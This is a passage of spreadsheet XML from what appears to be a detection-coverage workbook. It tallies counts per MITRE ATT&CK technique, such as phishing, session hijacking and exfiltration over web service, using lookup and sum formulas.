      <c r="BR56" s="12">
        <v>0</v>
      </c>
      <c r="BS56" s="12">
        <v>4</v>
      </c>
      <c r="BT56" s="13">
        <v>1</v>
      </c>
      <c r="BU56" s="394">
        <v>5</v>
      </c>
      <c r="BV56" s="292">
        <v>0</v>
      </c>
      <c r="BW56" s="322">
        <v>0</v>
      </c>
      <c r="BX56" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY56" s="12">
        <v>0</v>
      </c>
      <c r="BZ56" s="13">
        <v>0</v>
      </c>
      <c r="CA56" s="394">
        <v>0</v>
      </c>
      <c r="CB56" s="292">
        <v>0</v>
      </c>
      <c r="CC56" s="322">
        <v>0</v>
      </c>
      <c r="CD56" s="322" t="str">
        <f t="shared" si="12"/>
        <v>0 (0)</v>
      </c>
      <c r="CE56" s="12">
        <v>0</v>
      </c>
      <c r="CF56" s="12">
        <v>0</v>
      </c>
      <c r="CG56" s="13">
        <v>0</v>
      </c>
      <c r="CH56" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="57" spans="1:86" ht="15" customHeight="1">
      <c r="A57" s="4">
        <f t="shared" si="13"/>
        <v>55</v>
      </c>
      <c r="B57" s="4" t="str">
        <f>IFERROR(VLOOKUP(A57,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1563</v>
      </c>
      <c r="C57" s="493" t="str">
        <f>IFERROR(VLOOKUP(B57,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Remote Service Session Hijacking</v>
      </c>
      <c r="D57" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B57)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E57" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B57,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>97</v>
      </c>
      <c r="F57" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (97)</v>
      </c>
      <c r="G57" s="292">
        <v>157</v>
      </c>
      <c r="H57" s="322">
        <v>11</v>
      </c>
      <c r="I57" s="322" t="str">
        <f t="shared" si="0"/>
        <v>11 (157)</v>
      </c>
      <c r="J57" s="12">
        <v>1</v>
      </c>
      <c r="K57" s="13">
        <v>1</v>
      </c>
      <c r="L57" s="394">
        <v>11</v>
      </c>
      <c r="M57" s="322">
        <v>1</v>
      </c>
      <c r="N57" s="322">
        <v>1</v>
      </c>
      <c r="O57" s="322" t="str">
        <f t="shared" si="1"/>
        <v>1 (1)</v>
      </c>
      <c r="P57" s="12">
        <v>1</v>
      </c>
      <c r="Q57" s="13">
        <v>1</v>
      </c>
      <c r="R57" s="394">
        <v>1</v>
      </c>
      <c r="S57" s="292">
        <v>158</v>
      </c>
      <c r="T57" s="322">
        <v>12</v>
      </c>
      <c r="U57" s="322" t="str">
        <f t="shared" si="2"/>
        <v>12 (158)</v>
      </c>
      <c r="V57" s="12">
        <v>2</v>
      </c>
      <c r="W57" s="13">
        <v>1</v>
      </c>
      <c r="X57" s="394">
        <v>11</v>
      </c>
      <c r="Y57" s="392">
        <v>163</v>
      </c>
      <c r="Z57" s="392">
        <v>17</v>
      </c>
      <c r="AA57" s="322" t="str">
        <f t="shared" si="3"/>
        <v>17 (163)</v>
      </c>
      <c r="AB57" s="392">
        <v>7</v>
      </c>
      <c r="AC57" s="16">
        <v>1</v>
      </c>
      <c r="AD57" s="394">
        <v>12</v>
      </c>
      <c r="AE57" s="392">
        <v>32</v>
      </c>
      <c r="AF57" s="392">
        <v>24</v>
      </c>
      <c r="AG57" s="322" t="str">
        <f t="shared" si="4"/>
        <v>24 (32)</v>
      </c>
      <c r="AH57" s="392">
        <v>6</v>
      </c>
      <c r="AI57" s="16">
        <v>1</v>
      </c>
      <c r="AJ57" s="394">
        <v>13</v>
      </c>
      <c r="AK57" s="392">
        <v>195</v>
      </c>
      <c r="AL57" s="392">
        <v>41</v>
      </c>
      <c r="AM57" s="322" t="str">
        <f t="shared" si="5"/>
        <v>41 (195)</v>
      </c>
      <c r="AN57" s="392">
        <v>13</v>
      </c>
      <c r="AO57" s="16">
        <v>1</v>
      </c>
      <c r="AP57" s="394">
        <v>18</v>
      </c>
      <c r="AQ57" s="292">
        <v>0</v>
      </c>
      <c r="AR57" s="322">
        <v>0</v>
      </c>
      <c r="AS57" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT57" s="12">
        <v>0</v>
      </c>
      <c r="AU57" s="13">
        <v>0</v>
      </c>
      <c r="AV57" s="394">
        <v>0</v>
      </c>
      <c r="AW57" s="392">
        <v>0</v>
      </c>
      <c r="AX57" s="392">
        <v>0</v>
      </c>
      <c r="AY57" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ57" s="4">
        <v>0</v>
      </c>
      <c r="BA57" s="16">
        <v>0</v>
      </c>
      <c r="BB57" s="394">
        <v>0</v>
      </c>
      <c r="BC57" s="292">
        <v>158</v>
      </c>
      <c r="BD57" s="322">
        <v>12</v>
      </c>
      <c r="BE57" s="322" t="str">
        <f t="shared" si="8"/>
        <v>12 (158)</v>
      </c>
      <c r="BF57" s="12">
        <v>2</v>
      </c>
      <c r="BG57" s="13">
        <v>1</v>
      </c>
      <c r="BH57" s="394">
        <v>11</v>
      </c>
      <c r="BI57" s="292">
        <v>16</v>
      </c>
      <c r="BJ57" s="322">
        <v>16</v>
      </c>
      <c r="BK57" s="322" t="str">
        <f t="shared" si="9"/>
        <v>16 (16)</v>
      </c>
      <c r="BL57" s="12">
        <v>1</v>
      </c>
      <c r="BM57" s="13">
        <v>1</v>
      </c>
      <c r="BN57" s="394">
        <v>16</v>
      </c>
      <c r="BO57" s="292">
        <v>107</v>
      </c>
      <c r="BP57" s="322">
        <v>106</v>
      </c>
      <c r="BQ57" s="322" t="str">
        <f t="shared" si="10"/>
        <v>106 (107)</v>
      </c>
      <c r="BR57" s="12">
        <v>1</v>
      </c>
      <c r="BS57" s="12">
        <v>12</v>
      </c>
      <c r="BT57" s="13">
        <v>1</v>
      </c>
      <c r="BU57" s="394">
        <v>89</v>
      </c>
      <c r="BV57" s="292">
        <v>0</v>
      </c>
      <c r="BW57" s="322">
        <v>0</v>
      </c>
      <c r="BX57" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY57" s="12">
        <v>0</v>
      </c>
      <c r="BZ57" s="13">
        <v>0</v>
      </c>
      <c r="CA57" s="394">
        <v>0</v>
      </c>
      <c r="CB57" s="292">
        <v>4</v>
      </c>
      <c r="CC57" s="322">
        <v>4</v>
      </c>
      <c r="CD57" s="322" t="str">
        <f t="shared" si="12"/>
        <v>4 (4)</v>
      </c>
      <c r="CE57" s="12">
        <v>0</v>
      </c>
      <c r="CF57" s="12">
        <v>1</v>
      </c>
      <c r="CG57" s="13">
        <v>1</v>
      </c>
      <c r="CH57" s="394">
        <v>4</v>
      </c>
    </row>
    <row r="58" spans="1:86" ht="15" customHeight="1">
      <c r="A58" s="4">
        <f t="shared" si="13"/>
        <v>56</v>
      </c>
      <c r="B58" s="4" t="str">
        <f>IFERROR(VLOOKUP(A58,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1565</v>
      </c>
      <c r="C58" s="493" t="str">
        <f>IFERROR(VLOOKUP(B58,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Data Manipulation</v>
      </c>
      <c r="D58" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B58)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E58" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B58,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>1</v>
      </c>
      <c r="F58" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (1)</v>
      </c>
      <c r="G58" s="292">
        <v>0</v>
      </c>
      <c r="H58" s="322">
        <v>0</v>
      </c>
      <c r="I58" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J58" s="12">
        <v>0</v>
      </c>
      <c r="K58" s="13">
        <v>0</v>
      </c>
      <c r="L58" s="394">
        <v>0</v>
      </c>
      <c r="M58" s="322">
        <v>0</v>
      </c>
      <c r="N58" s="322">
        <v>0</v>
      </c>
      <c r="O58" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P58" s="12">
        <v>0</v>
      </c>
      <c r="Q58" s="13">
        <v>0</v>
      </c>
      <c r="R58" s="394">
        <v>0</v>
      </c>
      <c r="S58" s="292">
        <v>0</v>
      </c>
      <c r="T58" s="322">
        <v>0</v>
      </c>
      <c r="U58" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="V58" s="12">
        <v>0</v>
      </c>
      <c r="W58" s="13">
        <v>0</v>
      </c>
      <c r="X58" s="394">
        <v>0</v>
      </c>
      <c r="Y58" s="392">
        <v>1</v>
      </c>
      <c r="Z58" s="392">
        <v>1</v>
      </c>
      <c r="AA58" s="322" t="str">
        <f t="shared" si="3"/>
        <v>1 (1)</v>
      </c>
      <c r="AB58" s="392">
        <v>1</v>
      </c>
      <c r="AC58" s="16">
        <v>1</v>
      </c>
      <c r="AD58" s="394">
        <v>1</v>
      </c>
      <c r="AE58" s="392">
        <v>4</v>
      </c>
      <c r="AF58" s="392">
        <v>2</v>
      </c>
      <c r="AG58" s="322" t="str">
        <f t="shared" si="4"/>
        <v>2 (4)</v>
      </c>
      <c r="AH58" s="392">
        <v>2</v>
      </c>
      <c r="AI58" s="16">
        <v>1</v>
      </c>
      <c r="AJ58" s="394">
        <v>1</v>
      </c>
      <c r="AK58" s="392">
        <v>5</v>
      </c>
      <c r="AL58" s="392">
        <v>3</v>
      </c>
      <c r="AM58" s="322" t="str">
        <f t="shared" si="5"/>
        <v>3 (5)</v>
      </c>
      <c r="AN58" s="392">
        <v>3</v>
      </c>
      <c r="AO58" s="16">
        <v>1</v>
      </c>
      <c r="AP58" s="394">
        <v>1</v>
      </c>
      <c r="AQ58" s="292">
        <v>0</v>
      </c>
      <c r="AR58" s="322">
        <v>0</v>
      </c>
      <c r="AS58" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT58" s="12">
        <v>0</v>
      </c>
      <c r="AU58" s="13">
        <v>0</v>
      </c>
      <c r="AV58" s="394">
        <v>0</v>
      </c>
      <c r="AW58" s="392">
        <v>0</v>
      </c>
      <c r="AX58" s="392">
        <v>0</v>
      </c>
      <c r="AY58" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ58" s="4">
        <v>0</v>
      </c>
      <c r="BA58" s="16">
        <v>0</v>
      </c>
      <c r="BB58" s="394">
        <v>0</v>
      </c>
      <c r="BC58" s="292">
        <v>0</v>
      </c>
      <c r="BD58" s="322">
        <v>0</v>
      </c>
      <c r="BE58" s="322" t="str">
        <f t="shared" si="8"/>
        <v>0 (0)</v>
      </c>
      <c r="BF58" s="12">
        <v>0</v>
      </c>
      <c r="BG58" s="13">
        <v>0</v>
      </c>
      <c r="BH58" s="394">
        <v>0</v>
      </c>
      <c r="BI58" s="292">
        <v>0</v>
      </c>
      <c r="BJ58" s="322">
        <v>0</v>
      </c>
      <c r="BK58" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL58" s="12">
        <v>0</v>
      </c>
      <c r="BM58" s="13">
        <v>0</v>
      </c>
      <c r="BN58" s="394">
        <v>0</v>
      </c>
      <c r="BO58" s="292">
        <v>1</v>
      </c>
      <c r="BP58" s="322">
        <v>1</v>
      </c>
      <c r="BQ58" s="322" t="str">
        <f t="shared" si="10"/>
        <v>1 (1)</v>
      </c>
      <c r="BR58" s="12">
        <v>0</v>
      </c>
      <c r="BS58" s="12">
        <v>1</v>
      </c>
      <c r="BT58" s="13">
        <v>1</v>
      </c>
      <c r="BU58" s="394">
        <v>1</v>
      </c>
      <c r="BV58" s="292">
        <v>0</v>
      </c>
      <c r="BW58" s="322">
        <v>0</v>
      </c>
      <c r="BX58" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY58" s="12">
        <v>0</v>
      </c>
      <c r="BZ58" s="13">
        <v>0</v>
      </c>
      <c r="CA58" s="394">
        <v>0</v>
      </c>
      <c r="CB58" s="292">
        <v>0</v>
      </c>
      <c r="CC58" s="322">
        <v>0</v>
      </c>
      <c r="CD58" s="322" t="str">
        <f t="shared" si="12"/>
        <v>0 (0)</v>
      </c>
      <c r="CE58" s="12">
        <v>0</v>
      </c>
      <c r="CF58" s="12">
        <v>0</v>
      </c>
      <c r="CG58" s="13">
        <v>0</v>
      </c>
      <c r="CH58" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="59" spans="1:86" ht="15" customHeight="1">
      <c r="A59" s="4">
        <f t="shared" si="13"/>
        <v>57</v>
      </c>
      <c r="B59" s="4" t="str">
        <f>IFERROR(VLOOKUP(A59,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1566</v>
      </c>
      <c r="C59" s="493" t="str">
        <f>IFERROR(VLOOKUP(B59,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Phishing</v>
      </c>
      <c r="D59" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B59)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>2</v>
      </c>
      <c r="E59" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B59,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>172</v>
      </c>
      <c r="F59" s="579" t="str">
        <f t="shared" si="14"/>
        <v>2 (172)</v>
      </c>
      <c r="G59" s="292">
        <v>1205</v>
      </c>
      <c r="H59" s="322">
        <v>9</v>
      </c>
      <c r="I59" s="322" t="str">
        <f t="shared" si="0"/>
        <v>9 (1205)</v>
      </c>
      <c r="J59" s="12">
        <v>3</v>
      </c>
      <c r="K59" s="13">
        <v>1</v>
      </c>
      <c r="L59" s="394">
        <v>7</v>
      </c>
      <c r="M59" s="322">
        <v>5</v>
      </c>
      <c r="N59" s="322">
        <v>4</v>
      </c>
      <c r="O59" s="322" t="str">
        <f t="shared" si="1"/>
        <v>4 (5)</v>
      </c>
      <c r="P59" s="12">
        <v>4</v>
      </c>
      <c r="Q59" s="13">
        <v>0.5</v>
      </c>
      <c r="R59" s="394">
        <v>1</v>
      </c>
      <c r="S59" s="292">
        <v>1210</v>
      </c>
      <c r="T59" s="322">
        <v>13</v>
      </c>
      <c r="U59" s="322" t="str">
        <f t="shared" si="2"/>
        <v>13 (1210)</v>
      </c>
      <c r="V59" s="12">
        <v>7</v>
      </c>
      <c r="W59" s="13">
        <v>1</v>
      </c>
      <c r="X59" s="394">
        <v>8</v>
      </c>
      <c r="Y59" s="392">
        <v>1217</v>
      </c>
      <c r="Z59" s="392">
        <v>19</v>
      </c>
      <c r="AA59" s="322" t="str">
        <f t="shared" si="3"/>
        <v>19 (1217)</v>
      </c>
      <c r="AB59" s="392">
        <v>11</v>
      </c>
      <c r="AC59" s="16">
        <v>1</v>
      </c>
      <c r="AD59" s="394">
        <v>11</v>
      </c>
      <c r="AE59" s="392">
        <v>36</v>
      </c>
      <c r="AF59" s="392">
        <v>13</v>
      </c>
      <c r="AG59" s="322" t="str">
        <f t="shared" si="4"/>
        <v>13 (36)</v>
      </c>
      <c r="AH59" s="392">
        <v>9</v>
      </c>
      <c r="AI59" s="16">
        <v>1</v>
      </c>
      <c r="AJ59" s="394">
        <v>4</v>
      </c>
      <c r="AK59" s="392">
        <v>1253</v>
      </c>
      <c r="AL59" s="392">
        <v>32</v>
      </c>
      <c r="AM59" s="322" t="str">
        <f t="shared" si="5"/>
        <v>32 (1253)</v>
      </c>
      <c r="AN59" s="392">
        <v>20</v>
      </c>
      <c r="AO59" s="16">
        <v>1</v>
      </c>
      <c r="AP59" s="394">
        <v>12</v>
      </c>
      <c r="AQ59" s="292">
        <v>0</v>
      </c>
      <c r="AR59" s="322">
        <v>0</v>
      </c>
      <c r="AS59" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT59" s="12">
        <v>0</v>
      </c>
      <c r="AU59" s="13">
        <v>0</v>
      </c>
      <c r="AV59" s="394">
        <v>0</v>
      </c>
      <c r="AW59" s="392">
        <v>3</v>
      </c>
      <c r="AX59" s="392">
        <v>2</v>
      </c>
      <c r="AY59" s="322" t="str">
        <f t="shared" si="7"/>
        <v>2 (3)</v>
      </c>
      <c r="AZ59" s="4">
        <v>2</v>
      </c>
      <c r="BA59" s="16">
        <v>1</v>
      </c>
      <c r="BB59" s="394">
        <v>2</v>
      </c>
      <c r="BC59" s="292">
        <v>1213</v>
      </c>
      <c r="BD59" s="322">
        <v>15</v>
      </c>
      <c r="BE59" s="322" t="str">
        <f t="shared" si="8"/>
        <v>15 (1213)</v>
      </c>
      <c r="BF59" s="12">
        <v>9</v>
      </c>
      <c r="BG59" s="13">
        <v>1</v>
      </c>
      <c r="BH59" s="394">
        <v>8</v>
      </c>
      <c r="BI59" s="292">
        <v>3</v>
      </c>
      <c r="BJ59" s="322">
        <v>2</v>
      </c>
      <c r="BK59" s="322" t="str">
        <f t="shared" si="9"/>
        <v>2 (3)</v>
      </c>
      <c r="BL59" s="12">
        <v>2</v>
      </c>
      <c r="BM59" s="13">
        <v>0.5</v>
      </c>
      <c r="BN59" s="394">
        <v>1</v>
      </c>
      <c r="BO59" s="292">
        <v>176</v>
      </c>
      <c r="BP59" s="322">
        <v>175</v>
      </c>
      <c r="BQ59" s="322" t="str">
        <f t="shared" si="10"/>
        <v>175 (176)</v>
      </c>
      <c r="BR59" s="12">
        <v>2</v>
      </c>
      <c r="BS59" s="12">
        <v>7</v>
      </c>
      <c r="BT59" s="13">
        <v>1</v>
      </c>
      <c r="BU59" s="394">
        <v>170</v>
      </c>
      <c r="BV59" s="292">
        <v>3</v>
      </c>
      <c r="BW59" s="322">
        <v>3</v>
      </c>
      <c r="BX59" s="322" t="str">
        <f t="shared" si="11"/>
        <v>3 (3)</v>
      </c>
      <c r="BY59" s="12">
        <v>2</v>
      </c>
      <c r="BZ59" s="13">
        <v>1</v>
      </c>
      <c r="CA59" s="394">
        <v>2</v>
      </c>
      <c r="CB59" s="292">
        <v>0</v>
      </c>
      <c r="CC59" s="322">
        <v>0</v>
      </c>
      <c r="CD59" s="322" t="str">
        <f t="shared" si="12"/>
        <v>0 (0)</v>
      </c>
      <c r="CE59" s="12">
        <v>0</v>
      </c>
      <c r="CF59" s="12">
        <v>0</v>
      </c>
      <c r="CG59" s="13">
        <v>0</v>
      </c>
      <c r="CH59" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="60" spans="1:86" ht="15" customHeight="1">
      <c r="A60" s="4">
        <f t="shared" si="13"/>
        <v>58</v>
      </c>
      <c r="B60" s="4" t="str">
        <f>IFERROR(VLOOKUP(A60,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1567</v>
      </c>
      <c r="C60" s="493" t="str">
        <f>IFERROR(VLOOKUP(B60,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Exfiltration Over Web Service</v>
      </c>
      <c r="D60" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B60)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E60" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B60,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>26</v>
      </c>
      <c r="F60" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (26)</v>
      </c>
      <c r="G60" s="292">
        <v>0</v>
      </c>
      <c r="H60" s="322">
        <v>0</v>
      </c>
      <c r="I60" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J60" s="12">
        <v>0</v>
      </c>
      <c r="K60" s="13">
        <v>0</v>
      </c>
      <c r="L60" s="394">
        <v>0</v>
      </c>
      <c r="M60" s="322">
        <v>0</v>
      </c>
      <c r="N60" s="322">
        <v>0</v>
      </c>
      <c r="O60" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P60" s="12">
        <v>0</v>
      </c>
      <c r="Q60" s="13">
        <v>0</v>
      </c>
      <c r="R60" s="394">
        <v>0</v>
      </c>
      <c r="S60" s="292">
        <v>0</v>
      </c>
      <c r="T60" s="322">
        <v>0</v>
      </c>
      <c r="U60" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="V60" s="12">
        <v>0</v>
      </c>
      <c r="W60" s="13">
        <v>0</v>
      </c>
      <c r="X60" s="394">
        <v>0</v>
      </c>
      <c r="Y60" s="392">
        <v>2</v>
      </c>
      <c r="Z60" s="392">
        <v>2</v>
      </c>
      <c r="AA60" s="322" t="str">
        <f t="shared" si="3"/>
        <v>2 (2)</v>
      </c>
      <c r="AB60" s="392">
        <v>1</v>
      </c>
      <c r="AC60" s="16">
        <v>1</v>
      </c>
      <c r="AD60" s="394">
        <v>2</v>
      </c>
      <c r="AE60" s="392">
        <v>11</v>
      </c>
      <c r="AF60" s="392">
        <v>10</v>
      </c>
      <c r="AG60" s="322" t="str">
        <f t="shared" si="4"/>
        <v>10 (11)</v>
      </c>
      <c r="AH60" s="392">
        <v>2</v>
      </c>
      <c r="AI60" s="16">
        <v>1</v>
      </c>
      <c r="AJ60" s="394">
        <v>9</v>
      </c>
      <c r="AK60" s="392">
        <v>13</v>
      </c>
      <c r="AL60" s="392">
        <v>12</v>
      </c>
      <c r="AM60" s="322" t="str">
        <f t="shared" si="5"/>
        <v>12 (13)</v>
      </c>
      <c r="AN60" s="392">
        <v>3</v>
      </c>
      <c r="AO60" s="16">
        <v>1</v>
      </c>
      <c r="AP60" s="394">
        <v>10</v>
      </c>
      <c r="AQ60" s="292">
        <v>0</v>
      </c>
      <c r="AR60" s="322">
        <v>0</v>
      </c>
      <c r="AS60" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT60" s="12">
        <v>0</v>
      </c>
      <c r="AU60" s="13">
        <v>0</v>
      </c>
      <c r="AV60" s="394">
        <v>0</v>
      </c>
      <c r="AW60" s="392">
        <v>0</v>
      </c>
      <c r="AX60" s="392">
        <v>0</v>
      </c>
      <c r="AY60" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ60" s="4">
        <v>0</v>
      </c>
      <c r="BA60" s="16">
        <v>0</v>
      </c>
      <c r="BB60" s="394">
        <v>0</v>
      </c>
      <c r="BC60" s="292">
        <v>0</v>
      </c>
      <c r="BD60" s="322">
        <v>0</v>
      </c>
      <c r="BE60" s="322" t="str">
        <f t="shared" si="8"/>
        <v>0 (0)</v>
      </c>
      <c r="BF60" s="12">
        <v>0</v>
      </c>
      <c r="BG60" s="13">
        <v>0</v>
      </c>
      <c r="BH60" s="394">
        <v>0</v>
      </c>
      <c r="BI60" s="292">
        <v>0</v>
      </c>
      <c r="BJ60" s="322">
        <v>0</v>
      </c>
      <c r="BK60" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL60" s="12">
        <v>0</v>
      </c>
      <c r="BM60" s="13">
        <v>0</v>
      </c>
      <c r="BN60" s="394">
        <v>0</v>
      </c>
      <c r="BO60" s="292">
        <v>6</v>
      </c>
      <c r="BP60" s="322">
        <v>6</v>
      </c>
      <c r="BQ60" s="322" t="str">
        <f t="shared" si="10"/>
        <v>6 (6)</v>
      </c>
      <c r="BR60" s="12">
        <v>0</v>
      </c>
      <c r="BS60" s="12">
        <v>2</v>
      </c>
      <c r="BT60" s="13">
        <v>1</v>
      </c>
      <c r="BU60" s="394">
        <v>6</v>
      </c>
      <c r="BV60" s="292">
        <v>0</v>
      </c>
      <c r="BW60" s="322">
        <v>0</v>
      </c>
      <c r="BX60" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY60" s="12">
        <v>0</v>
      </c>
      <c r="BZ60" s="13">
        <v>0</v>
      </c>
      <c r="CA60" s="394">
        <v>0</v>
      </c>
      <c r="CB60" s="292">
        <v>0</v>
      </c>
      <c r="CC60" s="322">
        <v>0</v>
      </c>
      <c r="CD60" s="322" t="str">
        <f t="shared" si="12"/>
        <v>0 (0)</v>
      </c>
      <c r="CE60" s="12">
        <v>0</v>
      </c>
      <c r="CF60" s="12">
        <v>0</v>
      </c>
      <c r="CG60" s="13">
        <v>0</v>
      </c>
      <c r="CH60" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="61" spans="1:86" ht="15" customHeight="1">
      <c r="A61" s="4">
        <f t="shared" si="13"/>
        <v>59</v>
      </c>
      <c r="B61" s="4" t="str">
        <f>IFERROR(VLOOKUP(A61,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1568</v>
      </c>
      <c r="C61" s="493" t="str">
        <f>IFERROR(VLOOKUP(B61,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Dynamic Resolution</v>
      </c>
      <c r="D61" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B61)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E61" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B61,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>267</v>
      </c>
      <c r="F61" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (267)</v>
      </c>
      <c r="G61" s="292">
        <v>1</v>
      </c>
      <c r="H61" s="322">
        <v>1</v>
      </c>
      <c r="I61" s="322" t="str">
        <f t="shared" si="0"/>
        <v>1 (1)</v>
      </c>
      <c r="J61" s="12">
        <v>1</v>
      </c>
      <c r="K61" s="13">
        <v>1</v>
      </c>
      <c r="L61" s="394">
        <v>1</v>
      </c>
      <c r="M61" s="322">
        <v>0</v>
      </c>
      <c r="N61" s="322">
        <v>0</v>
      </c>
      <c r="O61" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P61" s="12">
        <v>0</v>
      </c>
      <c r="Q61" s="13">
        <v>0</v>
      </c>
      <c r="R61" s="394">
        <v>0</v>
      </c>
      <c r="S61" s="292">
        <v>1</v>
      </c>
      <c r="T61" s="322">
        <v>1</v>
      </c>
      <c r="U61" s="322" t="str">
        <f t="shared" si="2"/>
        <v>1 (1)</v>
      </c>
      <c r="V61" s="12">
        <v>1</v>
      </c>
      <c r="W61" s="13">
        <v>1</v>
      </c>
      <c r="X61" s="394">
        <v>1</v>
      </c>
      <c r="Y61" s="392">
        <v>252</v>
      </c>
      <c r="Z61" s="392">
        <v>248</v>
      </c>
      <c r="AA61" s="322" t="str">
        <f t="shared" si="3"/>
        <v>248 (252)</v>
      </c>
      <c r="AB61" s="392">
        <v>4</v>
      </c>
      <c r="AC61" s="16">
        <v>1</v>
      </c>
      <c r="AD61" s="394">
        <v>125</v>
      </c>
      <c r="AE61" s="392">
        <v>8</v>
      </c>
      <c r="AF61" s="392">
        <v>6</v>
      </c>
      <c r="AG61" s="322" t="str">
        <f t="shared" si="4"/>
        <v>6 (8)</v>
      </c>
      <c r="AH61" s="392">
        <v>2</v>
      </c>
      <c r="AI61" s="16">
        <v>1</v>
      </c>
      <c r="AJ61" s="394">
        <v>3</v>
      </c>
      <c r="AK61" s="392">
        <v>260</v>
      </c>
      <c r="AL61" s="392">
        <v>254</v>
      </c>
      <c r="AM61" s="322" t="str">
        <f t="shared" si="5"/>
        <v>254 (260)</v>
      </c>
      <c r="AN61" s="392">
        <v>6</v>
      </c>
      <c r="AO61" s="16">
        <v>1</v>
      </c>
      <c r="AP61" s="394">
        <v>127</v>
      </c>
      <c r="AQ61" s="292">
        <v>0</v>
      </c>
      <c r="AR61" s="322">
        <v>0</v>
      </c>
      <c r="AS61" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT61" s="12">
        <v>0</v>
      </c>
      <c r="AU61" s="13">
        <v>0</v>
      </c>
      <c r="AV61" s="394">
        <v>0</v>
      </c>
      <c r="AW61" s="392">
        <v>5</v>
      </c>
      <c r="AX61" s="392">
        <v>1</v>
      </c>
      <c r="AY61" s="322" t="str">
        <f t="shared" si="7"/>
        <v>1 (5)</v>
      </c>
      <c r="AZ61" s="4">
        <v>1</v>
      </c>
      <c r="BA61" s="16">
        <v>1</v>
      </c>
      <c r="BB61" s="394">
        <v>1</v>
      </c>
      <c r="BC61" s="292">
        <v>6</v>
      </c>
      <c r="BD61" s="322">
        <v>2</v>
      </c>
      <c r="BE61" s="322" t="str">
